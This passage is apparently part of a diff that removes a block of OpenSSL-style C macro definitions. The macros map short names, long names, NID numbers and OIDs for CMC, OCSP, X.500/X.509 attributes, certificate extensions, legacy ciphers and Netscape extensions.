-#define OBJ_id_cmc_revokeRequest		OBJ_id_cmc,17L
-
-#define SN_id_cmc_regInfo		"id-cmc-regInfo"
-#define NID_id_cmc_regInfo		341
-#define OBJ_id_cmc_regInfo		OBJ_id_cmc,18L
-
-#define SN_id_cmc_responseInfo		"id-cmc-responseInfo"
-#define NID_id_cmc_responseInfo		342
-#define OBJ_id_cmc_responseInfo		OBJ_id_cmc,19L
-
-#define SN_id_cmc_queryPending		"id-cmc-queryPending"
-#define NID_id_cmc_queryPending		343
-#define OBJ_id_cmc_queryPending		OBJ_id_cmc,21L
-
-#define SN_id_cmc_popLinkRandom		"id-cmc-popLinkRandom"
-#define NID_id_cmc_popLinkRandom		344
-#define OBJ_id_cmc_popLinkRandom		OBJ_id_cmc,22L
-
-#define SN_id_cmc_popLinkWitness		"id-cmc-popLinkWitness"
-#define NID_id_cmc_popLinkWitness		345
-#define OBJ_id_cmc_popLinkWitness		OBJ_id_cmc,23L
-
-#define SN_id_cmc_confirmCertAcceptance		"id-cmc-confirmCertAcceptance"
-#define NID_id_cmc_confirmCertAcceptance		346
-#define OBJ_id_cmc_confirmCertAcceptance		OBJ_id_cmc,24L
-
-#define SN_id_on_personalData		"id-on-personalData"
-#define NID_id_on_personalData		347
-#define OBJ_id_on_personalData		OBJ_id_on,1L
-
-#define SN_id_on_permanentIdentifier		"id-on-permanentIdentifier"
-#define LN_id_on_permanentIdentifier		"Permanent Identifier"
-#define NID_id_on_permanentIdentifier		858
-#define OBJ_id_on_permanentIdentifier		OBJ_id_on,3L
-
-#define SN_id_pda_dateOfBirth		"id-pda-dateOfBirth"
-#define NID_id_pda_dateOfBirth		348
-#define OBJ_id_pda_dateOfBirth		OBJ_id_pda,1L
-
-#define SN_id_pda_placeOfBirth		"id-pda-placeOfBirth"
-#define NID_id_pda_placeOfBirth		349
-#define OBJ_id_pda_placeOfBirth		OBJ_id_pda,2L
-
-#define SN_id_pda_gender		"id-pda-gender"
-#define NID_id_pda_gender		351
-#define OBJ_id_pda_gender		OBJ_id_pda,3L
-
-#define SN_id_pda_countryOfCitizenship		"id-pda-countryOfCitizenship"
-#define NID_id_pda_countryOfCitizenship		352
-#define OBJ_id_pda_countryOfCitizenship		OBJ_id_pda,4L
-
-#define SN_id_pda_countryOfResidence		"id-pda-countryOfResidence"
-#define NID_id_pda_countryOfResidence		353
-#define OBJ_id_pda_countryOfResidence		OBJ_id_pda,5L
-
-#define SN_id_aca_authenticationInfo		"id-aca-authenticationInfo"
-#define NID_id_aca_authenticationInfo		354
-#define OBJ_id_aca_authenticationInfo		OBJ_id_aca,1L
-
-#define SN_id_aca_accessIdentity		"id-aca-accessIdentity"
-#define NID_id_aca_accessIdentity		355
-#define OBJ_id_aca_accessIdentity		OBJ_id_aca,2L
-
-#define SN_id_aca_chargingIdentity		"id-aca-chargingIdentity"
-#define NID_id_aca_chargingIdentity		356
-#define OBJ_id_aca_chargingIdentity		OBJ_id_aca,3L
-
-#define SN_id_aca_group		"id-aca-group"
-#define NID_id_aca_group		357
-#define OBJ_id_aca_group		OBJ_id_aca,4L
-
-#define SN_id_aca_role		"id-aca-role"
-#define NID_id_aca_role		358
-#define OBJ_id_aca_role		OBJ_id_aca,5L
-
-#define SN_id_aca_encAttrs		"id-aca-encAttrs"
-#define NID_id_aca_encAttrs		399
-#define OBJ_id_aca_encAttrs		OBJ_id_aca,6L
-
-#define SN_id_qcs_pkixQCSyntax_v1		"id-qcs-pkixQCSyntax-v1"
-#define NID_id_qcs_pkixQCSyntax_v1		359
-#define OBJ_id_qcs_pkixQCSyntax_v1		OBJ_id_qcs,1L
-
-#define SN_id_cct_crs		"id-cct-crs"
-#define NID_id_cct_crs		360
-#define OBJ_id_cct_crs		OBJ_id_cct,1L
-
-#define SN_id_cct_PKIData		"id-cct-PKIData"
-#define NID_id_cct_PKIData		361
-#define OBJ_id_cct_PKIData		OBJ_id_cct,2L
-
-#define SN_id_cct_PKIResponse		"id-cct-PKIResponse"
-#define NID_id_cct_PKIResponse		362
-#define OBJ_id_cct_PKIResponse		OBJ_id_cct,3L
-
-#define SN_id_ppl_anyLanguage		"id-ppl-anyLanguage"
-#define LN_id_ppl_anyLanguage		"Any language"
-#define NID_id_ppl_anyLanguage		664
-#define OBJ_id_ppl_anyLanguage		OBJ_id_ppl,0L
-
-#define SN_id_ppl_inheritAll		"id-ppl-inheritAll"
-#define LN_id_ppl_inheritAll		"Inherit all"
-#define NID_id_ppl_inheritAll		665
-#define OBJ_id_ppl_inheritAll		OBJ_id_ppl,1L
-
-#define SN_Independent		"id-ppl-independent"
-#define LN_Independent		"Independent"
-#define NID_Independent		667
-#define OBJ_Independent		OBJ_id_ppl,2L
-
-#define SN_ad_OCSP		"OCSP"
-#define LN_ad_OCSP		"OCSP"
-#define NID_ad_OCSP		178
-#define OBJ_ad_OCSP		OBJ_id_ad,1L
-
-#define SN_ad_ca_issuers		"caIssuers"
-#define LN_ad_ca_issuers		"CA Issuers"
-#define NID_ad_ca_issuers		179
-#define OBJ_ad_ca_issuers		OBJ_id_ad,2L
-
-#define SN_ad_timeStamping		"ad_timestamping"
-#define LN_ad_timeStamping		"AD Time Stamping"
-#define NID_ad_timeStamping		363
-#define OBJ_ad_timeStamping		OBJ_id_ad,3L
-
-#define SN_ad_dvcs		"AD_DVCS"
-#define LN_ad_dvcs		"ad dvcs"
-#define NID_ad_dvcs		364
-#define OBJ_ad_dvcs		OBJ_id_ad,4L
-
-#define SN_caRepository		"caRepository"
-#define LN_caRepository		"CA Repository"
-#define NID_caRepository		785
-#define OBJ_caRepository		OBJ_id_ad,5L
-
-#define OBJ_id_pkix_OCSP		OBJ_ad_OCSP
-
-#define SN_id_pkix_OCSP_basic		"basicOCSPResponse"
-#define LN_id_pkix_OCSP_basic		"Basic OCSP Response"
-#define NID_id_pkix_OCSP_basic		365
-#define OBJ_id_pkix_OCSP_basic		OBJ_id_pkix_OCSP,1L
-
-#define SN_id_pkix_OCSP_Nonce		"Nonce"
-#define LN_id_pkix_OCSP_Nonce		"OCSP Nonce"
-#define NID_id_pkix_OCSP_Nonce		366
-#define OBJ_id_pkix_OCSP_Nonce		OBJ_id_pkix_OCSP,2L
-
-#define SN_id_pkix_OCSP_CrlID		"CrlID"
-#define LN_id_pkix_OCSP_CrlID		"OCSP CRL ID"
-#define NID_id_pkix_OCSP_CrlID		367
-#define OBJ_id_pkix_OCSP_CrlID		OBJ_id_pkix_OCSP,3L
-
-#define SN_id_pkix_OCSP_acceptableResponses		"acceptableResponses"
-#define LN_id_pkix_OCSP_acceptableResponses		"Acceptable OCSP Responses"
-#define NID_id_pkix_OCSP_acceptableResponses		368
-#define OBJ_id_pkix_OCSP_acceptableResponses		OBJ_id_pkix_OCSP,4L
-
-#define SN_id_pkix_OCSP_noCheck		"noCheck"
-#define LN_id_pkix_OCSP_noCheck		"OCSP No Check"
-#define NID_id_pkix_OCSP_noCheck		369
-#define OBJ_id_pkix_OCSP_noCheck		OBJ_id_pkix_OCSP,5L
-
-#define SN_id_pkix_OCSP_archiveCutoff		"archiveCutoff"
-#define LN_id_pkix_OCSP_archiveCutoff		"OCSP Archive Cutoff"
-#define NID_id_pkix_OCSP_archiveCutoff		370
-#define OBJ_id_pkix_OCSP_archiveCutoff		OBJ_id_pkix_OCSP,6L
-
-#define SN_id_pkix_OCSP_serviceLocator		"serviceLocator"
-#define LN_id_pkix_OCSP_serviceLocator		"OCSP Service Locator"
-#define NID_id_pkix_OCSP_serviceLocator		371
-#define OBJ_id_pkix_OCSP_serviceLocator		OBJ_id_pkix_OCSP,7L
-
-#define SN_id_pkix_OCSP_extendedStatus		"extendedStatus"
-#define LN_id_pkix_OCSP_extendedStatus		"Extended OCSP Status"
-#define NID_id_pkix_OCSP_extendedStatus		372
-#define OBJ_id_pkix_OCSP_extendedStatus		OBJ_id_pkix_OCSP,8L
-
-#define SN_id_pkix_OCSP_valid		"valid"
-#define NID_id_pkix_OCSP_valid		373
-#define OBJ_id_pkix_OCSP_valid		OBJ_id_pkix_OCSP,9L
-
-#define SN_id_pkix_OCSP_path		"path"
-#define NID_id_pkix_OCSP_path		374
-#define OBJ_id_pkix_OCSP_path		OBJ_id_pkix_OCSP,10L
-
-#define SN_id_pkix_OCSP_trustRoot		"trustRoot"
-#define LN_id_pkix_OCSP_trustRoot		"Trust Root"
-#define NID_id_pkix_OCSP_trustRoot		375
-#define OBJ_id_pkix_OCSP_trustRoot		OBJ_id_pkix_OCSP,11L
-
-#define SN_algorithm		"algorithm"
-#define LN_algorithm		"algorithm"
-#define NID_algorithm		376
-#define OBJ_algorithm		1L,3L,14L,3L,2L
-
-#define SN_md5WithRSA		"RSA-NP-MD5"
-#define LN_md5WithRSA		"md5WithRSA"
-#define NID_md5WithRSA		104
-#define OBJ_md5WithRSA		OBJ_algorithm,3L
-
-#define SN_des_ecb		"DES-ECB"
-#define LN_des_ecb		"des-ecb"
-#define NID_des_ecb		29
-#define OBJ_des_ecb		OBJ_algorithm,6L
-
-#define SN_des_cbc		"DES-CBC"
-#define LN_des_cbc		"des-cbc"
-#define NID_des_cbc		31
-#define OBJ_des_cbc		OBJ_algorithm,7L
-
-#define SN_des_ofb64		"DES-OFB"
-#define LN_des_ofb64		"des-ofb"
-#define NID_des_ofb64		45
-#define OBJ_des_ofb64		OBJ_algorithm,8L
-
-#define SN_des_cfb64		"DES-CFB"
-#define LN_des_cfb64		"des-cfb"
-#define NID_des_cfb64		30
-#define OBJ_des_cfb64		OBJ_algorithm,9L
-
-#define SN_rsaSignature		"rsaSignature"
-#define NID_rsaSignature		377
-#define OBJ_rsaSignature		OBJ_algorithm,11L
-
-#define SN_dsa_2		"DSA-old"
-#define LN_dsa_2		"dsaEncryption-old"
-#define NID_dsa_2		67
-#define OBJ_dsa_2		OBJ_algorithm,12L
-
-#define SN_dsaWithSHA		"DSA-SHA"
-#define LN_dsaWithSHA		"dsaWithSHA"
-#define NID_dsaWithSHA		66
-#define OBJ_dsaWithSHA		OBJ_algorithm,13L
-
-#define SN_shaWithRSAEncryption		"RSA-SHA"
-#define LN_shaWithRSAEncryption		"shaWithRSAEncryption"
-#define NID_shaWithRSAEncryption		42
-#define OBJ_shaWithRSAEncryption		OBJ_algorithm,15L
-
-#define SN_des_ede_ecb		"DES-EDE"
-#define LN_des_ede_ecb		"des-ede"
-#define NID_des_ede_ecb		32
-#define OBJ_des_ede_ecb		OBJ_algorithm,17L
-
-#define SN_des_ede3_ecb		"DES-EDE3"
-#define LN_des_ede3_ecb		"des-ede3"
-#define NID_des_ede3_ecb		33
-
-#define SN_des_ede_cbc		"DES-EDE-CBC"
-#define LN_des_ede_cbc		"des-ede-cbc"
-#define NID_des_ede_cbc		43
-
-#define SN_des_ede_cfb64		"DES-EDE-CFB"
-#define LN_des_ede_cfb64		"des-ede-cfb"
-#define NID_des_ede_cfb64		60
-
-#define SN_des_ede3_cfb64		"DES-EDE3-CFB"
-#define LN_des_ede3_cfb64		"des-ede3-cfb"
-#define NID_des_ede3_cfb64		61
-
-#define SN_des_ede_ofb64		"DES-EDE-OFB"
-#define LN_des_ede_ofb64		"des-ede-ofb"
-#define NID_des_ede_ofb64		62
-
-#define SN_des_ede3_ofb64		"DES-EDE3-OFB"
-#define LN_des_ede3_ofb64		"des-ede3-ofb"
-#define NID_des_ede3_ofb64		63
-
-#define SN_desx_cbc		"DESX-CBC"
-#define LN_desx_cbc		"desx-cbc"
-#define NID_desx_cbc		80
-
-#define SN_sha		"SHA"
-#define LN_sha		"sha"
-#define NID_sha		41
-#define OBJ_sha		OBJ_algorithm,18L
-
-#define SN_sha1		"SHA1"
-#define LN_sha1		"sha1"
-#define NID_sha1		64
-#define OBJ_sha1		OBJ_algorithm,26L
-
-#define SN_dsaWithSHA1_2		"DSA-SHA1-old"
-#define LN_dsaWithSHA1_2		"dsaWithSHA1-old"
-#define NID_dsaWithSHA1_2		70
-#define OBJ_dsaWithSHA1_2		OBJ_algorithm,27L
-
-#define SN_sha1WithRSA		"RSA-SHA1-2"
-#define LN_sha1WithRSA		"sha1WithRSA"
-#define NID_sha1WithRSA		115
-#define OBJ_sha1WithRSA		OBJ_algorithm,29L
-
-#define SN_ripemd160		"RIPEMD160"
-#define LN_ripemd160		"ripemd160"
-#define NID_ripemd160		117
-#define OBJ_ripemd160		1L,3L,36L,3L,2L,1L
-
-#define SN_ripemd160WithRSA		"RSA-RIPEMD160"
-#define LN_ripemd160WithRSA		"ripemd160WithRSA"
-#define NID_ripemd160WithRSA		119
-#define OBJ_ripemd160WithRSA		1L,3L,36L,3L,3L,1L,2L
-
-#define SN_sxnet		"SXNetID"
-#define LN_sxnet		"Strong Extranet ID"
-#define NID_sxnet		143
-#define OBJ_sxnet		1L,3L,101L,1L,4L,1L
-
-#define SN_X500		"X500"
-#define LN_X500		"directory services (X.500)"
-#define NID_X500		11
-#define OBJ_X500		2L,5L
-
-#define SN_X509		"X509"
-#define NID_X509		12
-#define OBJ_X509		OBJ_X500,4L
-
-#define SN_commonName		"CN"
-#define LN_commonName		"commonName"
-#define NID_commonName		13
-#define OBJ_commonName		OBJ_X509,3L
-
-#define SN_surname		"SN"
-#define LN_surname		"surname"
-#define NID_surname		100
-#define OBJ_surname		OBJ_X509,4L
-
-#define LN_serialNumber		"serialNumber"
-#define NID_serialNumber		105
-#define OBJ_serialNumber		OBJ_X509,5L
-
-#define SN_countryName		"C"
-#define LN_countryName		"countryName"
-#define NID_countryName		14
-#define OBJ_countryName		OBJ_X509,6L
-
-#define SN_localityName		"L"
-#define LN_localityName		"localityName"
-#define NID_localityName		15
-#define OBJ_localityName		OBJ_X509,7L
-
-#define SN_stateOrProvinceName		"ST"
-#define LN_stateOrProvinceName		"stateOrProvinceName"
-#define NID_stateOrProvinceName		16
-#define OBJ_stateOrProvinceName		OBJ_X509,8L
-
-#define SN_streetAddress		"street"
-#define LN_streetAddress		"streetAddress"
-#define NID_streetAddress		660
-#define OBJ_streetAddress		OBJ_X509,9L
-
-#define SN_organizationName		"O"
-#define LN_organizationName		"organizationName"
-#define NID_organizationName		17
-#define OBJ_organizationName		OBJ_X509,10L
-
-#define SN_organizationalUnitName		"OU"
-#define LN_organizationalUnitName		"organizationalUnitName"
-#define NID_organizationalUnitName		18
-#define OBJ_organizationalUnitName		OBJ_X509,11L
-
-#define SN_title		"title"
-#define LN_title		"title"
-#define NID_title		106
-#define OBJ_title		OBJ_X509,12L
-
-#define LN_description		"description"
-#define NID_description		107
-#define OBJ_description		OBJ_X509,13L
-
-#define LN_searchGuide		"searchGuide"
-#define NID_searchGuide		859
-#define OBJ_searchGuide		OBJ_X509,14L
-
-#define LN_businessCategory		"businessCategory"
-#define NID_businessCategory		860
-#define OBJ_businessCategory		OBJ_X509,15L
-
-#define LN_postalAddress		"postalAddress"
-#define NID_postalAddress		861
-#define OBJ_postalAddress		OBJ_X509,16L
-
-#define LN_postalCode		"postalCode"
-#define NID_postalCode		661
-#define OBJ_postalCode		OBJ_X509,17L
-
-#define LN_postOfficeBox		"postOfficeBox"
-#define NID_postOfficeBox		862
-#define OBJ_postOfficeBox		OBJ_X509,18L
-
-#define LN_physicalDeliveryOfficeName		"physicalDeliveryOfficeName"
-#define NID_physicalDeliveryOfficeName		863
-#define OBJ_physicalDeliveryOfficeName		OBJ_X509,19L
-
-#define LN_telephoneNumber		"telephoneNumber"
-#define NID_telephoneNumber		864
-#define OBJ_telephoneNumber		OBJ_X509,20L
-
-#define LN_telexNumber		"telexNumber"
-#define NID_telexNumber		865
-#define OBJ_telexNumber		OBJ_X509,21L
-
-#define LN_teletexTerminalIdentifier		"teletexTerminalIdentifier"
-#define NID_teletexTerminalIdentifier		866
-#define OBJ_teletexTerminalIdentifier		OBJ_X509,22L
-
-#define LN_facsimileTelephoneNumber		"facsimileTelephoneNumber"
-#define NID_facsimileTelephoneNumber		867
-#define OBJ_facsimileTelephoneNumber		OBJ_X509,23L
-
-#define LN_x121Address		"x121Address"
-#define NID_x121Address		868
-#define OBJ_x121Address		OBJ_X509,24L
-
-#define LN_internationaliSDNNumber		"internationaliSDNNumber"
-#define NID_internationaliSDNNumber		869
-#define OBJ_internationaliSDNNumber		OBJ_X509,25L
-
-#define LN_registeredAddress		"registeredAddress"
-#define NID_registeredAddress		870
-#define OBJ_registeredAddress		OBJ_X509,26L
-
-#define LN_destinationIndicator		"destinationIndicator"
-#define NID_destinationIndicator		871
-#define OBJ_destinationIndicator		OBJ_X509,27L
-
-#define LN_preferredDeliveryMethod		"preferredDeliveryMethod"
-#define NID_preferredDeliveryMethod		872
-#define OBJ_preferredDeliveryMethod		OBJ_X509,28L
-
-#define LN_presentationAddress		"presentationAddress"
-#define NID_presentationAddress		873
-#define OBJ_presentationAddress		OBJ_X509,29L
-
-#define LN_supportedApplicationContext		"supportedApplicationContext"
-#define NID_supportedApplicationContext		874
-#define OBJ_supportedApplicationContext		OBJ_X509,30L
-
-#define SN_member		"member"
-#define NID_member		875
-#define OBJ_member		OBJ_X509,31L
-
-#define SN_owner		"owner"
-#define NID_owner		876
-#define OBJ_owner		OBJ_X509,32L
-
-#define LN_roleOccupant		"roleOccupant"
-#define NID_roleOccupant		877
-#define OBJ_roleOccupant		OBJ_X509,33L
-
-#define SN_seeAlso		"seeAlso"
-#define NID_seeAlso		878
-#define OBJ_seeAlso		OBJ_X509,34L
-
-#define LN_userPassword		"userPassword"
-#define NID_userPassword		879
-#define OBJ_userPassword		OBJ_X509,35L
-
-#define LN_userCertificate		"userCertificate"
-#define NID_userCertificate		880
-#define OBJ_userCertificate		OBJ_X509,36L
-
-#define LN_cACertificate		"cACertificate"
-#define NID_cACertificate		881
-#define OBJ_cACertificate		OBJ_X509,37L
-
-#define LN_authorityRevocationList		"authorityRevocationList"
-#define NID_authorityRevocationList		882
-#define OBJ_authorityRevocationList		OBJ_X509,38L
-
-#define LN_certificateRevocationList		"certificateRevocationList"
-#define NID_certificateRevocationList		883
-#define OBJ_certificateRevocationList		OBJ_X509,39L
-
-#define LN_crossCertificatePair		"crossCertificatePair"
-#define NID_crossCertificatePair		884
-#define OBJ_crossCertificatePair		OBJ_X509,40L
-
-#define SN_name		"name"
-#define LN_name		"name"
-#define NID_name		173
-#define OBJ_name		OBJ_X509,41L
-
-#define SN_givenName		"GN"
-#define LN_givenName		"givenName"
-#define NID_givenName		99
-#define OBJ_givenName		OBJ_X509,42L
-
-#define SN_initials		"initials"
-#define LN_initials		"initials"
-#define NID_initials		101
-#define OBJ_initials		OBJ_X509,43L
-
-#define LN_generationQualifier		"generationQualifier"
-#define NID_generationQualifier		509
-#define OBJ_generationQualifier		OBJ_X509,44L
-
-#define LN_x500UniqueIdentifier		"x500UniqueIdentifier"
-#define NID_x500UniqueIdentifier		503
-#define OBJ_x500UniqueIdentifier		OBJ_X509,45L
-
-#define SN_dnQualifier		"dnQualifier"
-#define LN_dnQualifier		"dnQualifier"
-#define NID_dnQualifier		174
-#define OBJ_dnQualifier		OBJ_X509,46L
-
-#define LN_enhancedSearchGuide		"enhancedSearchGuide"
-#define NID_enhancedSearchGuide		885
-#define OBJ_enhancedSearchGuide		OBJ_X509,47L
-
-#define LN_protocolInformation		"protocolInformation"
-#define NID_protocolInformation		886
-#define OBJ_protocolInformation		OBJ_X509,48L
-
-#define LN_distinguishedName		"distinguishedName"
-#define NID_distinguishedName		887
-#define OBJ_distinguishedName		OBJ_X509,49L
-
-#define LN_uniqueMember		"uniqueMember"
-#define NID_uniqueMember		888
-#define OBJ_uniqueMember		OBJ_X509,50L
-
-#define LN_houseIdentifier		"houseIdentifier"
-#define NID_houseIdentifier		889
-#define OBJ_houseIdentifier		OBJ_X509,51L
-
-#define LN_supportedAlgorithms		"supportedAlgorithms"
-#define NID_supportedAlgorithms		890
-#define OBJ_supportedAlgorithms		OBJ_X509,52L
-
-#define LN_deltaRevocationList		"deltaRevocationList"
-#define NID_deltaRevocationList		891
-#define OBJ_deltaRevocationList		OBJ_X509,53L
-
-#define SN_dmdName		"dmdName"
-#define NID_dmdName		892
-#define OBJ_dmdName		OBJ_X509,54L
-
-#define LN_pseudonym		"pseudonym"
-#define NID_pseudonym		510
-#define OBJ_pseudonym		OBJ_X509,65L
-
-#define SN_role		"role"
-#define LN_role		"role"
-#define NID_role		400
-#define OBJ_role		OBJ_X509,72L
-
-#define SN_X500algorithms		"X500algorithms"
-#define LN_X500algorithms		"directory services - algorithms"
-#define NID_X500algorithms		378
-#define OBJ_X500algorithms		OBJ_X500,8L
-
-#define SN_rsa		"RSA"
-#define LN_rsa		"rsa"
-#define NID_rsa		19
-#define OBJ_rsa		OBJ_X500algorithms,1L,1L
-
-#define SN_mdc2WithRSA		"RSA-MDC2"
-#define LN_mdc2WithRSA		"mdc2WithRSA"
-#define NID_mdc2WithRSA		96
-#define OBJ_mdc2WithRSA		OBJ_X500algorithms,3L,100L
-
-#define SN_mdc2		"MDC2"
-#define LN_mdc2		"mdc2"
-#define NID_mdc2		95
-#define OBJ_mdc2		OBJ_X500algorithms,3L,101L
-
-#define SN_id_ce		"id-ce"
-#define NID_id_ce		81
-#define OBJ_id_ce		OBJ_X500,29L
-
-#define SN_subject_directory_attributes		"subjectDirectoryAttributes"
-#define LN_subject_directory_attributes		"X509v3 Subject Directory Attributes"
-#define NID_subject_directory_attributes		769
-#define OBJ_subject_directory_attributes		OBJ_id_ce,9L
-
-#define SN_subject_key_identifier		"subjectKeyIdentifier"
-#define LN_subject_key_identifier		"X509v3 Subject Key Identifier"
-#define NID_subject_key_identifier		82
-#define OBJ_subject_key_identifier		OBJ_id_ce,14L
-
-#define SN_key_usage		"keyUsage"
-#define LN_key_usage		"X509v3 Key Usage"
-#define NID_key_usage		83
-#define OBJ_key_usage		OBJ_id_ce,15L
-
-#define SN_private_key_usage_period		"privateKeyUsagePeriod"
-#define LN_private_key_usage_period		"X509v3 Private Key Usage Period"
-#define NID_private_key_usage_period		84
-#define OBJ_private_key_usage_period		OBJ_id_ce,16L
-
-#define SN_subject_alt_name		"subjectAltName"
-#define LN_subject_alt_name		"X509v3 Subject Alternative Name"
-#define NID_subject_alt_name		85
-#define OBJ_subject_alt_name		OBJ_id_ce,17L
-
-#define SN_issuer_alt_name		"issuerAltName"
-#define LN_issuer_alt_name		"X509v3 Issuer Alternative Name"
-#define NID_issuer_alt_name		86
-#define OBJ_issuer_alt_name		OBJ_id_ce,18L
-
-#define SN_basic_constraints		"basicConstraints"
-#define LN_basic_constraints		"X509v3 Basic Constraints"
-#define NID_basic_constraints		87
-#define OBJ_basic_constraints		OBJ_id_ce,19L
-
-#define SN_crl_number		"crlNumber"
-#define LN_crl_number		"X509v3 CRL Number"
-#define NID_crl_number		88
-#define OBJ_crl_number		OBJ_id_ce,20L
-
-#define SN_crl_reason		"CRLReason"
-#define LN_crl_reason		"X509v3 CRL Reason Code"
-#define NID_crl_reason		141
-#define OBJ_crl_reason		OBJ_id_ce,21L
-
-#define SN_invalidity_date		"invalidityDate"
-#define LN_invalidity_date		"Invalidity Date"
-#define NID_invalidity_date		142
-#define OBJ_invalidity_date		OBJ_id_ce,24L
-
-#define SN_delta_crl		"deltaCRL"
-#define LN_delta_crl		"X509v3 Delta CRL Indicator"
-#define NID_delta_crl		140
-#define OBJ_delta_crl		OBJ_id_ce,27L
-
-#define SN_issuing_distribution_point		"issuingDistributionPoint"
-#define LN_issuing_distribution_point		"X509v3 Issuing Distribution Point"
-#define NID_issuing_distribution_point		770
-#define OBJ_issuing_distribution_point		OBJ_id_ce,28L
-
-#define SN_certificate_issuer		"certificateIssuer"
-#define LN_certificate_issuer		"X509v3 Certificate Issuer"
-#define NID_certificate_issuer		771
-#define OBJ_certificate_issuer		OBJ_id_ce,29L
-
-#define SN_name_constraints		"nameConstraints"
-#define LN_name_constraints		"X509v3 Name Constraints"
-#define NID_name_constraints		666
-#define OBJ_name_constraints		OBJ_id_ce,30L
-
-#define SN_crl_distribution_points		"crlDistributionPoints"
-#define LN_crl_distribution_points		"X509v3 CRL Distribution Points"
-#define NID_crl_distribution_points		103
-#define OBJ_crl_distribution_points		OBJ_id_ce,31L
-
-#define SN_certificate_policies		"certificatePolicies"
-#define LN_certificate_policies		"X509v3 Certificate Policies"
-#define NID_certificate_policies		89
-#define OBJ_certificate_policies		OBJ_id_ce,32L
-
-#define SN_any_policy		"anyPolicy"
-#define LN_any_policy		"X509v3 Any Policy"
-#define NID_any_policy		746
-#define OBJ_any_policy		OBJ_certificate_policies,0L
-
-#define SN_policy_mappings		"policyMappings"
-#define LN_policy_mappings		"X509v3 Policy Mappings"
-#define NID_policy_mappings		747
-#define OBJ_policy_mappings		OBJ_id_ce,33L
-
-#define SN_authority_key_identifier		"authorityKeyIdentifier"
-#define LN_authority_key_identifier		"X509v3 Authority Key Identifier"
-#define NID_authority_key_identifier		90
-#define OBJ_authority_key_identifier		OBJ_id_ce,35L
-
-#define SN_policy_constraints		"policyConstraints"
-#define LN_policy_constraints		"X509v3 Policy Constraints"
-#define NID_policy_constraints		401
-#define OBJ_policy_constraints		OBJ_id_ce,36L
-
-#define SN_ext_key_usage		"extendedKeyUsage"
-#define LN_ext_key_usage		"X509v3 Extended Key Usage"
-#define NID_ext_key_usage		126
-#define OBJ_ext_key_usage		OBJ_id_ce,37L
-
-#define SN_freshest_crl		"freshestCRL"
-#define LN_freshest_crl		"X509v3 Freshest CRL"
-#define NID_freshest_crl		857
-#define OBJ_freshest_crl		OBJ_id_ce,46L
-
-#define SN_inhibit_any_policy		"inhibitAnyPolicy"
-#define LN_inhibit_any_policy		"X509v3 Inhibit Any Policy"
-#define NID_inhibit_any_policy		748
-#define OBJ_inhibit_any_policy		OBJ_id_ce,54L
-
-#define SN_target_information		"targetInformation"
-#define LN_target_information		"X509v3 AC Targeting"
-#define NID_target_information		402
-#define OBJ_target_information		OBJ_id_ce,55L
-
-#define SN_no_rev_avail		"noRevAvail"
-#define LN_no_rev_avail		"X509v3 No Revocation Available"
-#define NID_no_rev_avail		403
-#define OBJ_no_rev_avail		OBJ_id_ce,56L
-
-#define SN_anyExtendedKeyUsage		"anyExtendedKeyUsage"
-#define LN_anyExtendedKeyUsage		"Any Extended Key Usage"
-#define NID_anyExtendedKeyUsage		910
-#define OBJ_anyExtendedKeyUsage		OBJ_ext_key_usage,0L
-
-#define SN_netscape		"Netscape"
-#define LN_netscape		"Netscape Communications Corp."
-#define NID_netscape		57
-#define OBJ_netscape		2L,16L,840L,1L,113730L
-
-#define SN_netscape_cert_extension		"nsCertExt"
-#define LN_netscape_cert_extension		"Netscape Certificate Extension"
-#define NID_netscape_cert_extension		58
-#define OBJ_netscape_cert_extension		OBJ_netscape,1L
-
-#define SN_netscape_data_type		"nsDataType"
-#define LN_netscape_data_type		"Netscape Data Type"
-#define NID_netscape_data_type		59
-#define OBJ_netscape_data_type		OBJ_netscape,2L
-
-#define SN_netscape_cert_type		"nsCertType"
-#define LN_netscape_cert_type		"Netscape Cert Type"
-#define NID_netscape_cert_type		71
-#define OBJ_netscape_cert_type		OBJ_netscape_cert_extension,1L
-
-#define SN_netscape_base_url		"nsBaseUrl"
-#define LN_netscape_base_url		"Netscape Base Url"
-#define NID_netscape_base_url		72
-#define OBJ_netscape_base_url		OBJ_netscape_cert_extension,2L
-
-#define SN_netscape_revocation_url		"nsRevocationUrl"
-#define LN_netscape_revocation_url		"Netscape Revocation Url"
-#define NID_netscape_revocation_url		73
-#define OBJ_netscape_revocation_url		OBJ_netscape_cert_extension,3L
-
-#define SN_netscape_ca_revocation_url		"nsCaRevocationUrl"
-#define LN_netscape_ca_revocation_url		"Netscape CA Revocation Url"
-#define NID_netscape_ca_revocation_url		74
-#define OBJ_netscape_ca_revocation_url		OBJ_netscape_cert_extension,4L
-
-#define SN_netscape_renewal_url		"nsRenewalUrl"
-#define LN_netscape_renewal_url		"Netscape Renewal Url"
-#define NID_netscape_renewal_url		75
-#define OBJ_netscape_renewal_url		OBJ_netscape_cert_extension,7L
-
-#define SN_netscape_ca_policy_url		"nsCaPolicyUrl"
-#define LN_netscape_ca_policy_url		"Netscape CA Policy Url"
-#define NID_netscape_ca_policy_url		76
-#define OBJ_netscape_ca_policy_url		OBJ_netscape_cert_extension,8L
-
-#define SN_netscape_ssl_server_name		"nsSslServerName"
-#define LN_netscape_ssl_server_name		"Netscape SSL Server Name"
-#define NID_netscape_ssl_server_name		77
-#define OBJ_netscape_ssl_server_name		OBJ_netscape_cert_extension,12L
-
-#define SN_netscape_comment		"nsComment"
-#define LN_netscape_comment		"Netscape Comment"
-#define NID_netscape_comment		78
-#define OBJ_netscape_comment		OBJ_netscape_cert_extension,13L
-
-#define SN_netscape_cert_sequence		"nsCertSequence"
-#define LN_netscape_cert_sequence		"Netscape Certificate Sequence"
-#define NID_netscape_cert_sequence		79
-#define OBJ_netscape_cert_sequence		OBJ_netscape_data_type,5L
-
-#define SN_ns_sgc		"nsSGC"
-#define LN_ns_sgc		"Netscape Server Gated Crypto"
-#define NID_ns_sgc		139
-#define OBJ_ns_sgc		OBJ_netscape,4L,1L
-
-#define SN_org		"ORG"
-#define LN_org		"org"
-#define NID_org		379
-#define OBJ_org		OBJ_iso,3L
-
-#define SN_dod		"DOD"
-#define LN_dod		"dod"
-#define NID_dod		380
-#define OBJ_dod		OBJ_org,6L
-
-#define SN_iana		"IANA"
-#define LN_iana		"iana"
-#define NID_iana		381
-#define OBJ_iana		OBJ_dod,1L
-
-#define OBJ_internet		OBJ_iana
-
-#define SN_Directory		"directory"
-#define LN_Directory		"Directory"
-#define NID_Directory		382
-#define OBJ_Directory		OBJ_internet,1L
-
-#define SN_Management		"mgmt"
-#define LN_Management		"Management"
-#define NID_Management		383
-#define OBJ_Management		OBJ_internet,2L
-
